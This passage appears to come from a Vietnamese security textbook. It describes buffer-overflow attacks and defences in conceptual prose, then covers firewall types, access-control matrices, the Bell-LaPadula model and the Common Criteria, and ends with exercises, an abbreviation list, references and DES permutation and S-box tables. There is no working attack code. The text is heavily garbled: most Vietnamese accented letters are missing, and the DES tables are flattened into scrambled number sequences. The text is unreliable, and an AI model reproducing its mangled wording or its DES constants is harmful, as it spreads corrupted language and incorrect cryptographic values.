Nu s dng ngn ng tim n khng an ton nh C, lp trnh vin cn vit code an ton mt cch tng minh. Bng thit k vi code

    - 134 mi, sau khi xem xt code c. Xem an ton trn b m nh tp con cc k thut lp trnh an ton ni chung. Ch n cc li nh, kim tra khng gian trong b m bt k. C ngh m rng an ton cho C nh to im pht thc thi, cn dch chng trnh vi chng trnh dch c bit. C mt s phng n th vin chun an ton, cc hm mi, nh strlcpy(). Ci t li an ton hn mt s hm chun nh th vin ng, chng hn Libsafe. B sung code ca chc nng nhp v thot kim tra ngn xp ghi nhn vic ghi , s dng yu t ngu nhin nh bo v ngn xp, kim tra vit gia bin cc b v con tr khung lu tr v a ch tr v. Chng trnh dng nu pht hin thay i. Pht hnh: bn dch li, h tr pht hin li hoc copy an ton lu tr/kim tra a ch tr v. Bo v trong thi gian chy S dng h tr b nh o to mt s vng b nh khng thc thi c nh stack, heap, global data. Cn h tr t cc phn cng b nh nh trong SPARC / Solaris systems, x86 Linux/Unix/Windows systems. Pht hnh h tr cho code ngn xp thc thi, cn mt s d phng c bit. Thao tc trn v tr ca cc cu trc d liu chnh, s dng tnh tin ngu nhin cho mi tin trnh, c vng a ch ln trn cc phng tin ca cc h thng hin i chng cc va chm v on a ch b m ch l khng th. V tr ngu nhin cho b m heap v v tr cc hm th vin chun. t cc trang bo v gia cc vng quan trng ca b nh, t c trong b nh nh a ch khng hp l. C th ngay c t gia cc khung ngn xp v cc b m heap trong thi gian thc thi v phi tr gi v khng gian. C nhiu cc phng n tn cng khc: phng n trn ngn xp, trn heap, trn d liu tng th, trn xu nh dng, trn s nguyn. C th c nhiu hn na c pht hin trong tng lai. Mt s khng th ngn chn tr khi code an ton lc ban u. Phng n trn ngn xp ch vit b m v con tr khung lu tr tr v xy ra nhng n khung gi tr v li gi hm iu khin bi k tn cng c dng khi c trn b m gii hn. V d tch ra bi mt khung. Tuy c cc hn ch: cn bit a ch chnh xc ca b m, hm gi thc hin vi khung gi, phng n trn ngn xp thay a ch tr v bng hm th vin chun p li s bo v ngn xp khng thc thi. K tn cng xy dng cc tham s ph hp trn ngn xp pha trn a chi tr v. K tn cng c th cn a ch chnh xc ca b m, c th ngay c kt ni hai li gi th vin. Cng c tn cng b m t trong heap. Thng thng t trn code ca chng trnh, b nh c yu cu bi chng trnh s dng cho cc cu trc d liu ng, v d nh danh sch mc ni. Khng c a ch tr v, nn khng c chuyn giao quyn iu khin d dng. C th c con tr hm khai thc hoc thao tc cu trc d liu qun tr. Cch bo v l dng heap ngu nhin v khng thc thi. C th tn cng b m t trong d liu tng th. C th t pha trn code ca chng trnh. Nu c con tr hm v b m c l hng hoc bng qun tr cc qu trnh lin k. Nhm ti vit con tr hm c gi sau . Cch bo v l dng vng d liu tng th ngu nhin v khng thc thi, dch chuyn con tr hm, cc trang bo v.

    - 135 VIII.4 Bc tng la VIII.4.1 M u Bc tng la pht trin mnh m, c ng dng trong cc cc h thng thng tin. By gi mi ngi u mun ln Internet v cc mng lin kt vi nhau. V vy cn quan tm thng xuyn v an ton. Khng d dng bo v tng h thng trong t chc. Thng thng s dng bc tng la, cung cp vng bo v nh mt phn ca chin lc an ton ton din. Bc tng la l g L im c chai kim sot v theo di. Cc mng lin kt vi tin cy khc nhau, buc c hn ch trn cc dch v ca mng. Chng hn, vn chuyn phi c giy php. Kim tra v kim sot truy cp, c th ci t cnh bo cc hnh vi bt thng. Cung cp bng NAT v s dng theo di gim st. Ci t mng ring o (VPN) s dng c ch an ton IPSec. C th min dch trc. Hn ch ca bc tng la Khng bo v c cc tn cng i vng qua n, chng hn mng ln lt, thit b modems. N ngn cn c cc t chc tin cy v dch v tin cy (SSL/SSH). Khng bo v chng cc mi e da t bn trong, chng hn nh nhng nhn vin bc tc hoc thng ng vi k xu. Khng th bo v chng vic truyn cc chng trnh hoc file nhim virus, v c phm vi rt rng cc dng file v cc h iu hnh VIII.4.2 Bc tng la cc lc gi L thnh phn ca bc tng la nhanh nht v n gin nht, l c s ca mi h thng tng la. N kim tra mi gi IP (khng c ng cnh) v cho php hay t chi tu theo qui tc xc nh. Suy ra c hn ch truy cp n cc dch v v cc cng. Cc ng li mc nh c th o Rng khng cho php tc l cm o Rng khng cm tc l cho php

    - 136 -

    Tn cng cc lc gi a ch IP la o: gi a ch ngun lm cho tin tng, b sung b lc ln mch chuyn ngn chn. Tn cng mch truyn gc: k tn cng t c truyn khc vi mc nh, ngn chn cc gi truyn gc Tn cng cc on tin (fragment) nh. Chia thng tin phn u thnh mt s on nh. Hoc b qua hoc sp xp li trc khi kim tra Bc tng la cc lc gi trng thi Lc gi truyn thng khng kim tra ng cnh ca tng cao hn, tc l snh cc gi v vi dng chy ra. Lc gi trng thi hng n yu cu . Chng kim tra mi gi IP trong ng cnh: gi vt theo di vi cc k client-server, kim tra tng gi ng thuc vo mt phin. Suy ra c kh nng tt hn pht hin cc gi gi tch khi ng cnh. VIII.4.3 Bc tng la cng giao tip tng ng dng (hoc proxy) C cng giao tip chuyn dng cho ng dng proxy (ngi c u quyn). C truy cp y n giao thc o Ngi s dng yu cu dch v t proxy o Proxy kim tra cc yu cu c hp l khng o Sau x l yu cu v tr li cho ngi s dng o C th vo/theo di vn chuyn tng ng dng Cn cc proxies khc nhau cho mi dch v o Mt s dch v h tr mt cch t nhin proxy o Nhng loi khc th cn gii quyt mt s vn

    - 137 -

    VIII.4.4 Bc tng la - cng giao tip mc mch vng Chuyn tip 2 kt ni TCP. C s an ton bng cch hn ch m cc kt ni ny cho php. Mi ln to ra chuyn tip thng thng khng kim tra ni dung. Thng thng c s dng khi tin cy ngi s dng bn trong bng cch cho php cc kt ni ra ngoi ni chung. Gi SOCKS c s dng rng ri cho mc ch ny.

    VIII.4.5 My ch Bastion H thng my ch an ton cao. Chy cng giao tip mc ng dng v mch vng. Hoc cung cp cc dch v truy cp bn ngoi. C tim nng th hin cc yu t ca my ch. V an ton bn vng, nn h iu hnh nng n hn, cc dch v chnh, b sung xc thc, proxies nh, an ton, c lp, khng c quyn. C th h tr 2 hay nhiu hn kt ni mng v c th c tin cy p buc chnh sch tch bch tin cy gia cc kt ni mng. Cu hnh bc tng la (Firewall Configurations)

    - 138 -

    VIII.4.6 Kim sot truy cp H thng xc nh c nh danh nh ngi s dng, xc nh cc ngun gc no n c th truy cp. M hnh tng qut l ma trn truy cp vi o Ch th - thc th ch ng (ngi s dng, qu trnh) o i tng - thc th b ng (file hoc ngun) o Quyn truy cp cch m i tng c truy cp C th c phn tch bi o Cc ct nh danh sch kim sot truy cp o Cc hng nh cc th v kh nng Ma trn kim sot quyn truy cp

    - 139 -

    VIII.4.7 Cc h thng my tnh tin cy An ton thng tin ngy cng quan trng. C cc mc khc nhau v s nhy cm ca thng tin o Phn loi thng tin qun s: bo mt, b mt Ch th (ngi hoc chng trnh) c nhiu quyn khc nhau truy cp n cc i tng thng tin. c bit nh an ton nhiu tng o Ch th c mc an ton ti a v hin ti o i tng c phn loi mc tin cy c nh Mun xem xt cc cch tng tin tng trong h thng cng c cc quyn . VIII.4.8 M hnh Bell LaPadula Mt trong nhng m hnh an ton ni ting nht. c ci t nh cc chnh sch bt buc trong h thng. C hai chnh sch chnh o Khng c ln (tnh cht an ton n gin) Ch th ch c th c/vit cc i tng nu mc an ton hin ti ca ch th tri hn (>=) phn loi ca i tng o Khng vit xung (tnh cht *) Ch th ch c th b sung/vit ln i tng nu mc an ton hin ti ca ch th c tri (<=) bi phn loi ca i tng Reference Monitor (Giao din ch dn)

    - 140 -

    Cc h thng my tnh trin khai Chnh ph c th pht trin cc h thng IT. ng u vi phm vi rng cc chun o TCSEC, IPSEC v by gi l Tiu chun Chung Xc nh mt s mc trin khai vi tng cng kim tra qui tc. xut bn danh sch cc sn phm trin khai o Ch hng ti s dng cho chnh ph/quc phng o Cng c th hu ch trong cng nghip VIII.4.9 Tiu chun chung c t yu cu an ton quc t khi u v xc nh tiu chun trin khai. Tch hp vi cc chun khc o Chng hn CSEC, ITSEC, CTCPEC (Canada), Federal (US) c t cc chun cho o Tiu chun trin khai o Phng php lun cho ng dng ca Tiu chun o Cc th tc hnh chnh trin khai, chng nhn v cc s ch nh Xc nh tp cc yu cu an ton, c ch trin khai (TOE). Yu cu ri vo trong 2 loi sau o Chc nng o S tin cy C hai c t chc theo lp classes ca h hoc cu thnh Cc yu cu Tiu chun chung Yu cu chc nng

    - 141 o Kim sot an ton, h tr m, trao i thng tin, bo v d liu ngi s dng, nh danh v xc thc, qun l an ton, tnh ring t, bo v cc hm an ton tin cy, ngun thit thc, truy cp TOE, ng dn tin cy Yu cu s tin cy o Qun l tham s h thng, phn phi v thao tc, pht trin, ti liu ch dn, h tr thi gian sng, kim tra, nh gi l hng, bo tr s tin cy Bi tp 1. Lit k v phn loi cc phn mm c hi v cc bin php phng chng. 2. Phn tch cc k thut xm nhp h thng v cch phng nga. 3. Nu cc bin php tng cng an ninh, bo mt my tnh c nhn da trn cc phn mm thng dng hin c. 4. Mc ch yu cu ca vic xy dng bc tng la. C nhng loi bc tng la no. 5. Nu cch thit lp bc tng la s dng cng c h tr trong h iu hnh. 6. Phn tch cc li trn b nh c th xy ra, nu nguyn nhn. 7. Tm hiu cc yu cu lp trnh an ton. 8. Trnh by mt s m hnh h thng my tnh tin cy.

    - 142 DANH MC CC K HIU, CC CH VIT TT Stt 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 K hiu ACL AES AH CA CERT CRL CSDL CNTT CSHT CBC CFB DBA DES DNA DSA DSS ECB ECC ESP FIPS IDEA Din gii Access Control List Danh sch kim sot truy cp Advanced Encryption Standard - chun m quc t Authentication Header - u mc xc thc Certification authority - Ch quyn chng nhn Computer emergency response team - i cp cu s c my tnh Certificate revocation list Danh sch thu hi chng nhn C s d liu Cng ngh thng tin C s h tng Cipher Block Chaining Dy m khi Cipher feedback - Phn hi m Database administrator - Qun tr h thng Data Encription Standards - Chun m d liu Domain Name System - H thng tn min Digital signature Algorithm - Thut ton ch k in t Digital signature standard Chun ch k in t Electronic codebook sch m in t Encription curve code m ng cong Elip Encapsulating security payload ti bo mt ng gi Federal Information Processing Standard - chun x l thng tin Lin bang International data encryption algorithm - Thut ton m d liu quc t

    - 143 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 IPKI KDC LAN MD NAT PKCS PKI PGP RSA SET SHA1 SMTP SOAP SSL TLS UID TTP URL VPN WAN WTLS Internet X.509 public key Infrastructure - H tng kho cng khai Internet X.509 Key Distribution Center Trung tm phn phi kha Local area network mng cc b Message digest digest bn tin Network address translation dch a ch mng Public key cryptography standard Chun m khoa cng khai Public Key Infrastructure - H tng kho chung Pretty Good Privacy Phn mm bo mt th in t Thut ton m cng khai RSA mang tn Rivest, Shamir, Adleman Secure Electronic transaction Thanh ton in t an ton Secure hash algorithm 1 Thut ton bm 1 Simple Mail Transfer Protocol Giao thc chuyn th n gin Simple Object Access Protocol Giao thc truy cp i tng n gin Secure Socket Layer giao thc bo mt lp vn chuyn Transport Layer Security Chun giao thc bo mt lp vn chuyn User Identification nh danh ngi s dng Trusted Third Party Bn th ba tin cy Uniform Resource Locator a ch ngun thng nht Virtual private network - mng ring o Wide area network - mng din rng Wireless transport layer security an ton tng vn chuyn khng dy

    - 144 TI LIU THAM KHO [1] William Stallings. Cryptography and Network Security: Principles and Practice. Third Edition. Pearson Education, 2003. [2] A. Menezes, P. van Oorschot v S. Vanstone. - Handbook of Applied Cryptography, Fifth Edition, CRC Press, 1996. [3] Douglas Stinson - Cryptography: Theory and Practice. Boca Raton. FL. CRC Press, 2007. [4] http://en.wikipedia.org [5] http://vn.wikipedia.org [6] http://www.ietf.org/rfc [7] http://www.schneier.com/blowfish.html [8] http://www.rsasecurity.com [9] http://people.csail.mit.edu/rivest/crypto-security.html [10] Nguyn Ngc Tun, Hng Phc. Cng ngh bo mt World Wide Web. Nh xut bn Thng k, 2005.

    - 145 PH LC

    1. Ph lc thut ton DES 1.1 Ph lc 1.1


    IP 58 60 62 64 57 59 61 63 50 52 54 56 49 51 53 55 42 44 46 48 41 43 45 47 34 36 38 40 33 35 37 39 26 28 30 32 25 27 29 31 18 20 22 24 17 19 21 23 10 12 14 16 9 11 13 15 2 4 6 8 1 3 5 7

    1.2

    Ph lc 1.2 IP-1 40 39 38 37 36 35 34 33 8 7 6 5 4 3 2 1 48 47 46 45 44 43 42 41 16 15 14 13 12 11 10 9 56 55 54 53 52 51 50 49 24 23 22 21 20 19 18 17 64 63 62 61 60 59 58 57 32 31 30 29 28 27 26 25

    1.3

    Ph lc 1.3 E 32 4 8 12 16 20 24 28 1 5 9 13 17 21 25 29 2 6 10 14 18 22 26 30 3 7 11 15 19 23 27 31 4 8 12 16 20 24 28 32 5 9 13 17 21 25 29 1

    1.4

    Ph lc 1.4: S box

    - 146 Ct [0] [1] [2] [3] [0] [1] [2] [3] [0] [1] [2] [3] [0] [1] [2] [3] [0] [1] [2] [3] [0] [1] [2] [3] [0] [1] [2] [3] [0] [1] [2] [3] [0] [1] [2] [3] [4] [5] [6] [7] 14 0 4 15 15 3 0 13 10 13 13 1 7 13 10 3 2 14 4 11 12 10 9 4 4 13 1 6 13 1 7 2 4 15 1 12 1 13 14 8 0 7 6 10 13 8 6 15 12 11 2 8 1 15 14 3 11 0 4 11 2 15 11 1 13 7 14 8 8 4 7 10 9 0 4 13 14 11 9 0 4 2 1 12 10 4 15 2 2 11 11 13 8 13 4 14 1 4 8 2 14 7 11 1 14 9 9 0 3 5 0 6 1 12 11 7 15 2 5 12 14 7 13 8 4 8 1 7 2 14 13 4 6 15 10 3 6 3 8 6 0 6 12 10 7 4 10 1 9 7 2 9 15 4 12 1 6 10 9 4 15 2 6 9 11 2 4 15 3 4 15 9 6 15 11 1 10 7 13 14 2 12 8 5 0 9 3 4 15 3 12 10 11 13 2 1 3 8 13 4 15 6 3 8 9 0 7 13 11 13 7 2 6 9 12 15 8 1 7 10 11 7 14 8 8 1 11 7 4 14 1 2 5 10 0 7 10 3 13 8 6 1 8 13 8 5 3 10 13 10 14 7 1 4 2 13 Hng [8] [9] S1 3 10 10 6 15 12 5 11 S2 9 7 12 0 5 8 11 6 S3 1 13 2 8 11 1 4 15 S4 1 2 4 7 15 1 9 4 S5 8 5 5 0 15 9 6 15 S6 0 13 6 1 7 0 11 14 S7 3 12 14 3 10 15 9 5 S8 10. 9 12 5 0 6 15 12 [10] [11] [12] [13] [14] [15] 6 12 9 3 2 1 12 7 12 5 2 14 8 2 3 5 3 15 12 0 3 13 4 1 9 5 6 0 3 6 10 9 12 11 7 14 13 10 6 12 7 14 12 3 5 12 14 11 15 10 5 9 4 14 10 7 7 12 8 15 14 11 13 0 5 9 3 10 12 6 9 0 11 12 5 11 11 1 5 12 13 3 6 10 14 0 1 6 5 2 0 14 5 0 15 3 9 5 10 0 0 9 3 5 4 11 10 5 12 10 2 7 0 9 3 4 7 11 13 0 10 15 5 2 0 14 3 5 0 3 5 6 5 11 2 14 2 15 14 2 4 14 8 2 14 8 0 5 5 3 11 8 6 8 9 3 12 9 5 6 7 8 0 13 10 5 15 9 8 1 7 12 15 9 4 14 9 6 14 3 11 8 6 13 1 6 2 12 7 2 8 11

    - 147 -

    1.5

    Ph lc 1.5 P 16 29 1 5 2 32 19 22 7 12 15 18 8 27 13 11 20 28 23 31 24 3 30 4 21 17 26 10 14 9 6 25

    1.6

    Ph lc 1.6 57 1 10 19 63 7 14 21 49 58 2 11 55 62 6 13 41 50 59 3 47 54 61 5 PC1 33 42 51 60 39 46 53 28 25 34 43 52 31 38 45 20 17 26 35 44 23 30 37 12 9 18 27 36 15 22 29 4

    1.7

    Ph lc 1.7 14 3 23 16 41 30 44 46 17 28 19 7 52 40 49 42 PC2 11 24 15 6 12 4 27 20 31 37 51 45 39 56 50 36 1 21 26 13 47 33 34 29 5 10 8 2 55 48 53 32

    You might also like